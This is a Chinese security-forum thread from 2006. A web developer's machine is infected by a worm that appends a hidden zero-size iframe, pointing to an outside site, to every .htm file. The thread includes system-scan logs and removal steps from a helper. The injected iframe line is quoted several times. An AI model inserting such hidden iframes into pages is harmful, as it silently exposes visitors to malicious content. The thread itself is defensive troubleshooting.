瑞星卡卡安全论坛

各位救命啊！
我是做网页的，但是我的电脑不知道中了什么病毒，这两天在每个htm的页面代码最后都会自动加一段：<IFRAME SRC="HTTP://www.ysbr.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
一打开那个页面就不断的自动连接到这个什么垃圾站HTTP://www.ysbr.cn/1.htm，刚删除它一会又回来了！而且我发现所有的.htm文件都是这样！真是烦啊，严重影响我的工作！

求各位大侠相救！要怎么样才能清楚它？

补充：我用瑞星查过了，但是并没有查到毒。

请下载SREng2（最新版） ，使用“智能扫描”，按下“扫描”按钮进行扫描，
扫描完成后按下“保存报告”按钮保存报告日志文件（SREng.LOG），把保存的报告
日志文件内容复制-粘贴上来,,日志一次粘不完，分次粘完，请不要修改。

下载地址
http://www.kztechs.com/sreng/sreng2.zip

谢谢啊，我上午用瑞星杀了93个病毒！不过主要都是威金worm.viking.eu，不知道是不是都杀完了，我看了很多帖子都说又会回来的，是不是很惨啊？
但是那个：<IFRAME SRC="HTTP://www.ysbr.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
还是在每个.htm页面都有！真是头痛啊！
我按照红夜鬼1大侠的方法扫描了一下，贴出来，请帮忙看看是怎么回事：
2006-12-23,11:11:49

System Repair Engineer 2.2.6.605
Smallfrogs (http://www.KZTechs.com)

Windows Server 2003 Enterprise Edition (Build 3790)
- 管理权限用户 - 完整功能

以下内容被选中：
所有的启动项目（包括注册表、启动文件夹、服务等）
浏览器加载项
正在运行的进程（包括进程模块信息）
文件关联
Winsock 提供者
Autorun.inf
HOSTS 文件


启动项目


注册表

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
(load)() [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
(shell)(Explorer.exe) [(Verified)Microsoft Corporation]
(Userinit)(C:\WINDOWS\system32\userinit.exe,) [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
(AppInit_DLLs)() [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
(UIHost)(%SystemRoot%\system32\logonui.exe) [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
({32CD708B-60A7-4C00-9377-D73EAA495F0F})(C:\WINDOWS\system32\RavExt.dll) [Beijing Rising Technology Co., Ltd.]

启动文件夹

N/A



--------------------------------------------------------------------------------



服务

[GSEK / GSEK]
(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\GSEK.exe)(N/A)
[HFIORTKOUGIK / HFIORTKOUGIK]
(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFIORTKOUGIK.exe)(N/A)
[Human Interface Device Access / HidServ]
(C:\WINDOWS\System32\svchost.exe -k netsvcs--)%SystemRoot%\System32\hidserv.dll)(N/A)
[PHZDXDDNVOIRTL / PHZDXDDNVOIRTL]
(C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PHZDXDDNVOIRTL.exe)(N/A)
[Remote Help Session Manager / Rasautol]
(C:\WINDOWS\system32\ntsokele.exe)(N/A)
[Rising Process Communication Center / RsCCenter]
("C:\Program Files\Rising\Rav\CCenter.exe")(Beijing Rising Technology Co., Ltd.)
[Rising RealTime Monitor / RsRavMon]
("C:\Program Files\Rising\Rav\Ravmond.exe")(Beijing Rising Technology Co., Ltd.)
[Windows DHCP Service / WinDHCPsvc]
(C:\WINDOWS\system32\rundll32.exe windhcp.ocx,start)(Microsoft Corporation)
--------------------------------------------------------------------------------



驱动程序

[Service for Realtek AC97 Audio (WDM) / ALCXWDM]
(system32\drivers\ALCXWDM.SYS)(Realtek Semiconductor Corp.)
[Rising TDI Base Driver / BaseTDI]
(System32\DRIVERS\BaseTDI.SYS)(Beijing Rising Technology Co., Ltd.)
[ExpScaner / ExpScaner]
(\??\C:\Program Files\Rising\Rav\ExpScan.sys)()
[HookCont / HookCont]
(\??\C:\Program Files\Rising\Rav\HOOKCONT.sys)(Rising)
[HookReg / HookReg]
(\??\C:\Program Files\Rising\Rav\HookReg.sys)()
[HookSys / HookSys]
(\??\C:\Program Files\Rising\Rav\HookSys.sys)(Rising)
[ialm / ialm]
(system32\DRIVERS\ialmnt5.sys)(Intel Corporation)
[IP in IP Tunnel Driver / IpInIp]
(system32\DRIVERS\ipinip.sys)(N/A)
[MEMSCAN / MEMSCAN]
(\??\C:\Program Files\Rising\Rav\MEMSCAN.sys)(瑞星软件有限公司)
[Netgroup Packet Filter / NPF]
(system32\DRIVERS\npf.sys)(CACE Technologies)
[Direct Parallel Link Driver / Ptilink]
(system32\DRIVERS\ptilink.sys)(Parallel Technologies, Inc.)
[RsNTGDI / RsNTGDI]
(\SystemRoot\system32\Drivers\RsNTGdi.sys)(Beijing Rising Technology Co., Ltd.)
[RSPPSYS / RSPPSYS]
(\??\C:\PROGRAM FILES\RISING\RAV\RSPPSYS.sys)(Rising)
[Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver / rtl8139]
(system32\DRIVERS\RTL8139.SYS)(Realtek Semiconductor Corporation)
[Secdrv / Secdrv]
(system32\DRIVERS\secdrv.sys)(N/A)
[squell / squell]
(\??\C:\WINDOWS\system32\wincab.sys)(N/A)
--------------------------------------------------------------------------------



浏览器加载项

[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (D:\Program Files\Adobe\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated)
[Flash 9]
{492B8F66-B8CF-4F7A-B0EE-B7383B92F5BA} (C:\WINDOWS\system\IceHBO.dll, N/A)
[SnapFlash Class]
{A44CBB0B-C77D-4BF5-87CC-B4EE79AD1B7E} (C:\Program Files\Common Files\justDo\Jd2002.dll, justDo Software)
[Flash 抓捕器]
{90BAE0EF-F4BF-4FAC-B2EC-2C725C34AF12} (, N/A)
[卡卡上网安全助手]
{DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} (C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.)
[导出到 Microsoft Excel(&x)]
(res://D:\PROGRA~1\MICROS~1\Office10\EXCEL.EXE/3000, N/A)
[用 Flash 抓捕器保存 Flash]
(res://C:\Program Files\Common Files\justDo\IECatcher.DLL/FlashCatcher.htm, N/A)

--------------------------------------------------------------------------------



正在运行的进程

[PID: 308][\SystemRoot\System32\smss.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 392][\??\C:\WINDOWS\system32\csrss.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 416][\??\C:\WINDOWS\system32\winlogon.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 460][C:\WINDOWS\system32\services.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 472][C:\WINDOWS\system32\lsass.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 616][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 708][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 792][C:\Program Files\Rising\Rav\CCenter.exe] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 3]
[PID: 840][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 856][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 884][C:\Program Files\Rising\Rav\Ravmond.exe] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 39]
[C:\Program Files\Rising\Rav\BWList.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 6]
[C:\Program Files\Rising\Rav\RsCommX.dll] [rising, 18, 0, 0, 1]
[C:\Program Files\Rising\Rav\rfwctrl.dll] [Beijing Rising Technology Co., Ltd., 5, 0, 0, 11]
[C:\Program Files\Rising\Rav\RsPPsys.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 3]
[C:\Program Files\Rising\Rav\RSAPPMGR.DLL] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 2]
[C:\Program Files\Rising\Rav\CfgDll.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 13]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
[C:\Program Files\Rising\Rav\RsLog.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 20]
[C:\Program Files\Rising\Rav\HOOKSYS.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 0]
[C:\Program Files\Rising\Rav\Scanner.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 8]
[C:\Program Files\Rising\Rav\libload.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 16]
[C:\Program Files\Rising\Rav\VirusLib.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 10]
[C:\Program Files\Rising\Rav\regmon.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 6]
[C:\Program Files\Rising\Rav\HookWeb.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 1]
[C:\Program Files\Rising\Rav\MemMon.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 12]
[C:\Program Files\Rising\Rav\expscan.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 4]
[C:\Program Files\Rising\Rav\mPorts.dll] [Beijing Rising Technology Co., Ltd., 4, 0, 0, 3]
[C:\Program Files\Rising\Rav\HookCont.dll] [Rising, 19, 0, 0, 0]
[C:\Program Files\Rising\Rav\SpamEng.dll] [N/A, 18, 0, 0, 6]
[C:\Program Files\Rising\Rav\engine.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 20]
[C:\Program Files\Rising\Rav\PostTrt.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 8]
[C:\Program Files\Rising\Rav\UnExe.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 9]
[C:\Program Files\Rising\Rav\ScanExec.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 15]
[C:\Program Files\Rising\Rav\ScanEx.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 30]
[C:\Program Files\Rising\Rav\ExtFile.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 23]
[C:\Program Files\Rising\Rav\NvFile.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 11]
[C:\Program Files\Rising\Rav\ScanMac.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 13]
[C:\Program Files\Rising\Rav\ScanSct.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 16]
[C:\Program Files\Rising\Rav\Unpacker.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 17]
[C:\Program Files\Rising\Rav\ScanPack.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 18]
[C:\Program Files\Rising\Rav\RsVM.dll] [N/A, 19, 0, 0, 13]
[C:\Program Files\Rising\Rav\Uroutine.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 19]
[C:\Program Files\Rising\Rav\ExtOLE.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 11]
[C:\Program Files\Rising\Rav\Uscript.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 17]
[C:\Program Files\Rising\Rav\ScanElf.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 11]
[C:\Program Files\Rising\Rav\ExtMail.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 13]
[PID: 916][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1072][C:\Program Files\Rising\Rav\RavStub.exe] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 4]
[C:\Program Files\Rising\Rav\RsCommX.dll] [rising, 18, 0, 0, 1]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
[PID: 1172][C:\WINDOWS\system32\spoolsv.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1280][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1332][C:\WINDOWS\system32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1500][C:\WINDOWS\system32\Dfssvc.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1720][C:\WINDOWS\system32\wbem\wmiprvse.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 192][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.3790.0 (srv03_rtm.030324-2048)]
[C:\WINDOWS\system32\RavExt.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 7]
[D:\Program Files\Adobe\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 7.0.0.0]
[D:\Program Files\WinRAR\rarext.dll] [N/A, N/A]
[D:\Program Files\Adobe\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.7.2006011200]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
[PID: 784][C:\WINDOWS\system32\ctfmon.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1164][C:\WINDOWS\System32\svchost.exe] [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 1788][C:\Program Files\Internet Explorer\IEXPLORE.EXE] [Microsoft Corporation, 6.00.3790.0 (srv03_rtm.030324-2048)]
[D:\Program Files\Adobe\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.7.2006011200]
[C:\Program Files\Common Files\justDo\Jd2002.dll] [justDo Software, 2, 6, 0, 1]
[C:\Program Files\Rising\Rav\RavScrCh.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 4]
[C:\WINDOWS\system32\Macromed\Flash\Flash8.ocx] [Macromedia, Inc., 8,0,22,0]
[D:\Program Files\Adobe\ActiveX\PDFShell.dll] [Adobe Systems, Inc., 7.0.0.0]
[D:\Program Files\WinRAR\rarext.dll] [N/A, N/A]
[C:\WINDOWS\system32\RavExt.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 7]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
[PID: 256][C:\Program Files\Internet Explorer\iexplore.exe] [Microsoft Corporation, 6.00.3790.0 (srv03_rtm.030324-2048)]
[D:\Program Files\Adobe\ActiveX\AcroIEHelper.dll] [Adobe Systems Incorporated, 7.0.7.2006011200]
[C:\Program Files\Common Files\justDo\Jd2002.dll] [justDo Software, 2, 6, 0, 1]
[C:\Program Files\Rising\Rav\RavScrCh.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 4]
[C:\WINDOWS\system32\Macromed\Flash\Flash8.ocx] [Macromedia, Inc., 8,0,22,0]
[PID: 3940][C:\Program Files\Rising\Rav\RavMon.exe] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 36]
[C:\Program Files\Rising\Rav\RsGuiLib.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 28]
[C:\Program Files\Rising\Rav\BWList.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 6]
[C:\Program Files\Rising\Rav\RSAPPMGR.DLL] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 2]
[C:\Program Files\Rising\Rav\CfgDll.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 13]
[C:\Program Files\Rising\Rav\RSCOMMON.DLL] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
[C:\Program Files\Rising\Rav\RsCommX.dll] [rising, 18, 0, 0, 1]
[C:\Program Files\Rising\Rav\RsXML.dll] [Beijing Rising Technology Co., Ltd., 19, 0, 0, 2]
[C:\Program Files\Rising\Rav\PngDll.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 5]
[PID: 604][C:\Program Files\Outlook Express\msimn.exe] [Microsoft Corporation, 6.00.3790.0 (srv03_rtm.030324-2048)]
[C:\Program Files\Rising\Rav\RavScrCh.dll] [Beijing Rising Technology Co., Ltd., 18, 0, 0, 4]
[PID: 2956][E:\soft\杀毒工具\SREng\SREng.exe] [Smallfrogs Studio, 2.2.6.605]



--------------------------------------------------------------------------------



文件关联

.TXT OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE OK. ["%1" %*]
.COM OK. ["%1" %*]
.PIF OK. ["%1" %*]
.REG OK. [regedit.exe "%1"]
.BAT OK. ["%1" %*]
.SCR OK. ["%1" /S]
.CHM OK. ["C:\WINDOWS\hh.exe" %1]
.HLP OK. [%SystemRoot%\system32\winhlp32.exe %1]
.INI OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.INF OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.VBS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK OK. [{00021401-0000-0000-C000-000000000046}]



--------------------------------------------------------------------------------



Winsock 提供者

N/A



--------------------------------------------------------------------------------



Autorun.inf

N/A



--------------------------------------------------------------------------------



HOSTS 文件

N/A



--------------------------------------------------------------------------------

请高手帮忙看下是怎么回事，是不是很多病毒啊？那些病毒好象老杀老回来的！
要怎么才能清除每个htm的页面代码最后自动加的一段：<IFRAME SRC="HTTP://www.ysbr.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>

谢谢了！实在感激不尽！

运行(双击)SRENG2，点“启动项目，服务，点“Win32服务应用程序”
勾选“隐藏微软服务”选中病毒服务
GSEK
[HFIORTKOUGIK
PHZDXDDNVOIRTL
Windows DHCP Service
Remote Help Session Manager
，选择“删除服务”
点“设置”选择“否”

运行SREng2,使用“系统修复”－－浏览器加载项－－删除
[Flash 9]
{492B8F66-B8CF-4F7A-B0EE-B7383B92F5BA} (C:\WINDOWS\system\IceHBO.dll, N/A)

重启按F８进入安全模式下
显示隐藏文件
删除：
C:\WINDOWS\system\IceHBO.dll
C:\WINDOWS\system32\ntsokele.exe
windhcp.ocx
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\清空文件夹

不管行不行先谢谢了，等下吃完饭有时间再试~~~呵呵

按照红夜鬼1高人的方法做真是管用哦！那段：<IFRAME SRC="HTTP://www.ysbr.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
不会在新的.htm出现了，我用查找替换的方法把以前的清掉以后，重启也没有了呢。
不过，现在又有一个新的问题啊！就是我现在打开网页，比如打开卡卡社区（打开其他网站也会），瑞星会弹出一连串的对话框啊。我有抓下图来：

附件: 80851620061223144139.jpg

请问这是什么意思啊？能不能同意修改注册表的？我怕是病毒之类的做怪所以不敢随便同意。
后面还有几个对话框的我就不一一抓下来了。

附件: 80851620061223144646.jpg

下载个超级兔子,清理一下注册表

谢谢红夜鬼1先。但是，我的天那！我今天早上一打开网页又发现这句<IFRAME SRC="HTTP://www.ysbr.cn/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
又回来了！搞的我马上没了心情！怎么办啊？
难道就真的只有重装系统甚至格式化硬盘了吗？

下面是我打开本机的.htm的时候抓的图，麻烦高手看看要怎么解决，先谢谢了：


附件: 80851620061225104925.jpg

C:\WINDOWS\里面好多~tmp2755.exe这样的东西！比如~tmp7258.exe、~tmp299.exe……这些删除了还是会回来的，只要我打开.htm文件就会生成两三个。到底是什么东西？

我是从来不敢打开这个HTTP://www.ysbr.cn/1.htm来看，不知道是什么垃圾，现在没打开已经被它烦的够怕的了，不敢打开。这东西害的我挺惨的，我给别人发邮件那人也说他好象也中毒了！

请红夜鬼及各高手们帮忙解决一下，本人及其他受害者万分感激！

C:\WINDOWS\里面好多~tmp2755.exe这样的东西！比如~tmp7258.exe、~tmp299.exe

到安全模式下删除,并到安全模式下杀一下毒

瑞星实时监控程序有没有关闭,看一下,特别是邮件

对啊，好象我开机之后瑞星那把伞就好象是提示说转入后台自动处理（具体那句话怎么说的没注意看清），那伞就不见，但是我发现我收发邮件就没看到它提示或者扫描有没有毒了。本来以前是不会这样没了伞的。请问红夜鬼，“特别是邮件”是不是说要注意瑞星有没有监控邮件？

没伞了吗,从新扫描日志上来

是啊，瑞星的伞只在刚开机的时候出现，然后它会没了，我要手动打开它。
这两天我都懒得去管这个病毒了，因为问题又不是很大，不至于让我无法工作，加上又比较忙，就没太关心了。但是，今天一个同事说他把一些文件上传到公司的服务器的时候发现服务器也感染了，而且就是我传染给他的病毒的症状！哎~~~真是罪过~~~公司装的也就是瑞星，但是怎么就不起作用呢？我们也有经常升级的。我的病毒库是25号的。

2006-12-26,15:10:16

System Repair Engineer 2.2.6.605
Smallfrogs (http://www.KZTechs.com)

Windows Server 2003 Enterprise Edition  (Build 3790)
- 管理权限用户 - 完整功能

以下内容被选中：
    所有的启动项目（包括注册表、启动文件夹、服务等）
    浏览器加载项
    正在运行的进程（包括进程模块信息）
    文件关联
    Winsock 提供者
    Autorun.inf
    HOSTS 文件


启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <load><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <RavTask><"C:\Program Files\Rising\Rav\RavTask.exe" -system>  [Beijing Rising Technology Co., Ltd.]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <shell><Explorer.exe>  [(Verified)Microsoft Corporation]
    <Userinit><C:\WINDOWS\system32\userinit.exe,>  [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
    <AppInit_DLLs><>  [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <UIHost><%SystemRoot%\system32\logonui.exe>  [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{32CD708B-60A7-4C00-9377-D73EAA495F0F}><C:\WINDOWS\system32\RavExt.dll>  [Beijing Rising Technology Co., Ltd.]

==================================
启动文件夹
N/A

==================================
服务
[HFIORTKOUGIK / HFIORTKOUGIK]
  <C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFIORTKOUGIK.exe><N/A>
[Human Interface Device Access / HidServ]
  <C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[PHZDXDDNVOIRTL / PHZDXDDNVOIRTL]
  <C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PHZDXDDNVOIRTL.exe><N/A>
[Remote Help Session Manager / Rasautol]
  <C:\WINDOWS\system32\ntsokele.exe><N/A>
[Rising Process Communication Center / RsCCenter]
  <"C:\Program Files\Rising\Rav\CCenter.exe"><Beijing Rising Technology Co., Ltd.>
[Rising RealTime Monitor / RsRavMon]
  <"C:\Program Files\Rising\Rav\Ravmond.exe"><Beijing Rising Technology Co., Ltd.>

==================================
驱动程序
[Service for Realtek AC97 Audio (WDM) / ALCXWDM]
  <system32\drivers\ALCXWDM.SYS><Realtek Semiconductor Corp.>
[Rising TDI Base Driver / BaseTDI]
  <System32\DRIVERS\BaseTDI.SYS><Beijing Rising Technology Co., Ltd.>
[ExpScaner / ExpScaner]
  <\??\C:\Program Files\Rising\Rav\ExpScan.sys><>
[HookCont / HookCont]
  <\??\C:\Program Files\Rising\Rav\HOOKCONT.sys><Rising>
[HookReg / HookReg]
  <\??\C:\Program Files\Rising\Rav\HookReg.sys><>
[HookSys / HookSys]
  <\??\C:\Program Files\Rising\Rav\HookSys.sys><Rising>
[ialm / ialm]
  <system32\DRIVERS\ialmnt5.sys><Intel Corporation>
[IP in IP Tunnel Driver / IpInIp]
  <system32\DRIVERS\ipinip.sys><N/A>
[MEMSCAN / MEMSCAN]
  <\??\C:\Program Files\Rising\Rav\MEMSCAN.sys><瑞星软件有限公司>
[Netgroup Packet Filter / NPF]
  <system32\DRIVERS\npf.sys><CACE Technologies>
[Direct Parallel Link Driver / Ptilink]
  <system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[RsNTGDI / RsNTGDI]
  <\SystemRoot\system32\Drivers\RsNTGdi.sys><Beijing Rising Technology Co., Ltd.>
[RSPPSYS / RSPPSYS]
  <\??\C:\Program Files\Rising\Rav\RSPPSYS.sys><Rising>
[Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver / rtl8139]
  <system32\DRIVERS\RTL8139.SYS><Realtek Semiconductor Corporation>
[Secdrv / Secdrv]
  <system32\DRIVERS\secdrv.sys><N/A>
[squell / squell]
  <\??\C:\WINDOWS\system32\wincab.sys><N/A>

==================================
浏览器加载项
[Adobe PDF Reader Link Helper]
  {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <D:\Program Files\Adobe\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Flash 抓捕器]
  {90BAE0EF-F4BF-4FAC-B2EC-2C725C34AF12} <, N/A>
[卡卡上网安全助手]
  {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} <C:\WINDOWS\system32\KakaTool.dll, Beijing Rising Technology Co., Ltd.>
[导出到 Microsoft Excel(&x)]
  <res://D:\PROGRA~1\MICROS~1\Office10\EXCEL.EXE/3000, N/A>
[用 Flash 抓捕器保存 Flash]
  <res://C:\Program Files\Common Files\justDo\IECatcher.DLL/FlashCatcher.htm, N/A>

==================================
正在运行的进程
[PID: 324][\SystemRoot\System32\smss.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 392][\??\C:\WINDOWS\system32\csrss.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 416][\??\C:\WINDOWS\system32\winlogon.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 460][C:\WINDOWS\system32\services.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 472][C:\WINDOWS\system32\lsass.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 640][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 700][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 804][C:\Program Files\Rising\Rav\CCenter.exe]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 3]
[PID: 848][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 880][C:\WINDOWS\system32\svchost.exe]  [Microsoft Corporation, 5.2.3790.0 (srv03_rtm.030324-2048)]
[PID: 908][C:\Program Files\Rising\Rav\Ravmond.exe]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 39]
    [C:\Program Files\Rising\Rav\BWList.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 6]
    [C:\Program Files\Rising\Rav\RsCommX.dll]  [rising, 18, 0, 0, 1]
    [C:\Program Files\Rising\Rav\rfwctrl.dll]  [Beijing Rising Technology Co., Ltd., 5, 0, 0, 11]
    [C:\Program Files\Rising\Rav\RsPPsys.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 3]
    [C:\Program Files\Rising\Rav\RSAPPMGR.DLL]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 2]
    [C:\Program Files\Rising\Rav\CfgDll.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 13]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 5]
    [C:\Program Files\Rising\Rav\RsLog.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 20]
    [C:\Program Files\Rising\Rav\HOOKSYS.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 0]
    [C:\Program Files\Rising\Rav\Scanner.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 8]
    [C:\Program Files\Rising\Rav\libload.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 16]
    [C:\Program Files\Rising\Rav\VirusLib.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 10]
    [C:\Program Files\Rising\Rav\regmon.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 6]
    [C:\Program Files\Rising\Rav\HookWeb.dll]  [Beijing Rising Technology Co., Ltd., 19, 0, 0, 1]
    [C:\Program Files\Rising\Rav\MemMon.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 12]
    [C:\Program Files\Rising\Rav\expscan.dll]  [Beijing Rising Technology Co., Ltd., 18, 0, 0, 4]
    [C:\Program Files\Rising\Rav\mPorts.dll]  [Beijing Rising Technology Co., Ltd., 4, 0, 0, 3]
    [C:\Program Files\Rising\Rav\HookCont.dll]  [Rising, 19, 0, 0, 0]
    [C:\Program Files\Rising\Rav\SpamEng.dll]  [N/A, 18, 0, 0, 6]
